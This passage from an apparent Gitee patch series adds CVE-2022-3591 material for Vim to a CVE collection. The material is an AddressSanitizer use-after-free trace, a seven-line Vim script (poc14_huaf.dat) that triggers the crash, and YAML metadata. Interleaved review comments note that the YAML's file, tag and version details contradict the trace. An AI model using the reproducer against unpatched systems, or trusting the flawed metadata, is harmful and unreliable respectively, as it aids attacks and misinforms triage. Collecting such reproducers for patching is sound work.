#12 0x55f4ac62dd32 in ex_call_inner /home/fuzz/vim/src/userfunc.c:5647 + #13 0x55f4ac62fb45 in ex_call /home/fuzz/vim/src/userfunc.c:5971 + #14 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #15 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #16 0x55f4ac001c18 in apply_autocmds_group /home/fuzz/vim/src/autocmd.c:2232 + #17 0x55f4ac000401 in apply_autocmds /home/fuzz/vim/src/autocmd.c:1710 + #18 0x55f4ac3a3fce in did_set_string_option /home/fuzz/vim/src/optionstr.c:2540 + #19 0x55f4ac399413 in set_string_option /home/fuzz/vim/src/optionstr.c:538 + #20 0x55f4ac38203f in set_option_value /home/fuzz/vim/src/option.c:4378 + #21 0x55f4ac382284 in set_option_value_give_err /home/fuzz/vim/src/option.c:4423 + #22 0x55f4ac3f61df in qf_fill_buffer /home/fuzz/vim/src/quickfix.c:4855 + #23 0x55f4ac3f3eea in ex_copen /home/fuzz/vim/src/quickfix.c:4372 + #24 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + #25 0x55f4ac17302d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990 + #26 0x55f4ac49d19f in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667 + #27 0x55f4ac49acce in cmd_source /home/fuzz/vim/src/scriptfile.c:1146 + #28 0x55f4ac49aef7 in ex_source /home/fuzz/vim/src/scriptfile.c:1189 + #29 0x55f4ac17bec2 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2578 + +SUMMARY: AddressSanitizer: heap-use-after-free /home/fuzz/vim/src/quickfix.c:1932 in qf_get_curlist +Shadow bytes around the buggy address: + 0x0c3680003780: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c3680003790: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c36800037a0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa + 0x0c36800037b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c36800037c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x0c36800037d0: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c36800037e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 0x0c36800037f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd + 
0x0c3680003800: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+ 0x0c3680003810: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+ 0x0c3680003820: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ Shadow gap: cc
+==147326==ABORTING
+```
+ **影响**
+Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.
--
Gitee
From a7c59c7109e9f2ca06da222f35c8cc55963a0bef Mon Sep 17 00:00:00 2001
From: Mz_zM
Date: Thu, 27 Apr 2023 15:18:55 +0000
Subject: [PATCH 04/11] rename cve/vim/2022/CVE-2022-3591/README.md to cve/vim/2022/CVE-2022-3591/poc14_huaf.dat.
Signed-off-by: Mz_zM
---
cve/vim/2022/CVE-2022-3591/{README.md => poc14_huaf.dat} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename cve/vim/2022/CVE-2022-3591/{README.md => poc14_huaf.dat} (100%)
diff --git a/cve/vim/2022/CVE-2022-3591/README.md b/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat
similarity index 100%
rename from cve/vim/2022/CVE-2022-3591/README.md
rename to cve/vim/2022/CVE-2022-3591/poc14_huaf.dat
--
Gitee
From cddc1d48cf2bbcd1a6207ee76a688e5a8c009f6d Mon Sep 17 00:00:00 2001
From: Mz_zM
Date: Thu, 27 Apr 2023 15:19:51 +0000
Subject: [PATCH 05/11] update cve/vim/2022/CVE-2022-3591/poc14_huaf.dat.
Signed-off-by: Mz_zM
---
cve/vim/2022/CVE-2022-3591/{poc14_huaf.dat => README.md} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename cve/vim/2022/CVE-2022-3591/{poc14_huaf.dat => README.md} (100%)
diff --git a/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat b/cve/vim/2022/CVE-2022-3591/README.md
similarity index 100%
rename from cve/vim/2022/CVE-2022-3591/poc14_huaf.dat
rename to cve/vim/2022/CVE-2022-3591/README.md
--
Gitee
From e217c5a5f8b6a55f977e978d86a462c04021be10 Mon Sep 17 00:00:00 2001
From: Mz_zM
Date: Thu, 27 Apr 2023 15:20:12 +0000
Subject: [PATCH 06/11] add cve/vim/2022/CVE-2022-3591.
Signed-off-by: Mz_zM
---
cve/vim/2022/CVE-2022-3591/poc14_huaf.dat | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/vim/2022/CVE-2022-3591/poc14_huaf.dat
diff --git a/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat b/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat
new file mode 100644
index 00000000..e69de29b
--
Gitee
From fcee7d1c1dbc2668c0609e4687ba2f3f24a68043 Mon Sep 17 00:00:00 2001
From: Mz_zM
Date: Thu, 27 Apr 2023 15:20:38 +0000
Subject: [PATCH 07/11] update cve/vim/2022/CVE-2022-3591/poc14_huaf.dat.
Signed-off-by: Mz_zM
---
cve/vim/2022/CVE-2022-3591/poc14_huaf.dat | 7 +++++++
1 file changed, 7 insertions(+)
diff --git a/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat b/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat
index e69de29b..7b8970d1 100644
--- a/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat
+++ b/cve/vim/2022/CVE-2022-3591/poc14_huaf.dat
@@ -0,0 +1,7 @@
+com-c Xo lol
+0scr
+so
+Xo
+lex''
+lop
+au FileType * cal setloclist(0,[],'f')
\ No newline at end of file
--
Gitee
From de411edce8298249438b48554d8fecf33be1f1a8 Mon Sep 17 00:00:00 2001
From: Mz_zM
Date: Fri, 28 Apr 2023 04:37:39 +0000
Subject: [PATCH 08/11] add cve/vim/2022/yaml/CVE-2022-3591.yaml.
Signed-off-by: Mz_zM
---
cve/vim/2022/yaml/CVE-2022-3591.yaml | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/vim/2022/yaml/CVE-2022-3591.yaml
diff --git a/cve/vim/2022/yaml/CVE-2022-3591.yaml b/cve/vim/2022/yaml/CVE-2022-3591.yaml
new file mode 100644
index 00000000..e69de29b
--
Gitee
From 4aa2f6fe5ce40cede437870d9657d1a0093b734a Mon Sep 17 00:00:00 2001
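Review bot: The README in this series invokes this reproducer as `-S /home/fuzz/test/poc14_huaf.dat`, a path from the reporter's fuzzing host, while the file is committed at `cve/vim/2022/CVE-2022-3591/poc14_huaf.dat`; the README command should use the repository-relative path so the crash can be reproduced from a checkout. The hunk ends with `\ No newline at end of file`, and a terminating newline would keep the script well-formed for line-oriented tooling. A leading comment line such as `" ASan heap-use-after-free reproducer for CVE-2022-3591; run against a sanitizer build as documented in README.md` would let a reader identify the file's purpose without opening the README.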
From: Mz_zM
Date: Fri, 28 Apr 2023 04:50:14 +0000
Subject: [PATCH 09/11] update cve/vim/2022/yaml/CVE-2022-3591.yaml.
Signed-off-by: Mz_zM
---
cve/vim/2022/yaml/CVE-2022-3591.yaml | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
diff --git a/cve/vim/2022/yaml/CVE-2022-3591.yaml b/cve/vim/2022/yaml/CVE-2022-3591.yaml
index e69de29b..844f5dce 100644
--- a/cve/vim/2022/yaml/CVE-2022-3591.yaml
+++ b/cve/vim/2022/yaml/CVE-2022-3591.yaml
@@ -0,0 +1,19 @@
+id: CVE-2022-3991
+source: https://huntr.dev/bounties/a5a998c2-4b07-47a7-91be-dbc1886b3921
+info:
+ name: Vim是一款基于UNIX平台的编辑器。
+ severity: High
+ description: |
+ Use After Free in function at buffer.c:5715 .
+ scope-of-influence:
+ vim<9.0.0789
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-3591
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2022-3591
+ cwe-id: CWE-416
+ cnvd-id: None
+ kve-id: None
+ tags: cve2022, buffer overflow
\ No newline at end of file
--
Gitee
From bacf6cac95bbc60ad798861cb10a3744c91fa513 Mon Sep 17 00:00:00 2001
From: Mz_zM
Date: Thu, 4 May 2023 14:03:16 +0000
Subject: [PATCH 10/11] update cve/vim/2022/yaml/CVE-2022-3591.yaml.
Signed-off-by: Mz_zM
---
cve/vim/2022/yaml/CVE-2022-3591.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cve/vim/2022/yaml/CVE-2022-3591.yaml b/cve/vim/2022/yaml/CVE-2022-3591.yaml
index 844f5dce..cc783981 100644
--- a/cve/vim/2022/yaml/CVE-2022-3591.yaml
+++ b/cve/vim/2022/yaml/CVE-2022-3591.yaml
@@ -1,4 +1,4 @@
-id: CVE-2022-3991
+id: CVE-2022-3591
 source: https://huntr.dev/bounties/a5a998c2-4b07-47a7-91be-dbc1886b3921
 info:
 name: Vim是一款基于UNIX平台的编辑器。
--
Gitee
From c8f6076c812cd22170b1d5fafee231c67b2c6d73 Mon Sep 17 00:00:00 2001
From: Mz_zM
Date: Thu, 4 May 2023 14:29:35 +0000
Subject: [PATCH 11/11] update openkylin_list.yaml.
Signed-off-by: Mz_zM
---
openkylin_list.yaml | 1 +
1 file changed, 1 insertion(+)
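Review bot: The `description` written here, `Use After Free in function at buffer.c:5715 .`, names no function and a different source file than the README in the same series, whose ASan report places the freed read in `qf_get_curlist` at `quickfix.c:1932`; one of the two records is wrong and they should be reconciled against the referenced advisory before this entry is used for triage. `tags: cve2022, buffer overflow` also contradicts `cwe-id: CWE-416`, which is use-after-free, so the tag should read `use after free`. `scope-of-influence: vim<9.0.0789` does not fit the README's stated test revision `tag: v9.0.0792`, which is later than that boundary, so either the tested commit or the affected range needs checking. The file additionally lacks a trailing newline, as the `\ No newline at end of file` marker shows.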
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 9b6a0f88..560bce4d 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -121,6 +121,7 @@ cve:
 - CVE-2022-2264
 - CVE-2022-2598
 - CVE-2022-3234
+ - CVE-2022-3591
 - CVE-2023-0433
 - CVE-2023-1355
 - CVE-2023-0049
--
Gitee